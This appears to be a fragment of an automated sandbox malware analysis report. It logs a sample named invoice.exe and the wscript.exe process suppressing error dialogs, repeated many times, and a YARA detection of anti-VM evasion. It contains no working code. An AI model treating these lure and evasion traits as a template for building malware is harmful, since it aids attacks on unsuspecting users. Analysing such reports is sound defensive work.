          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3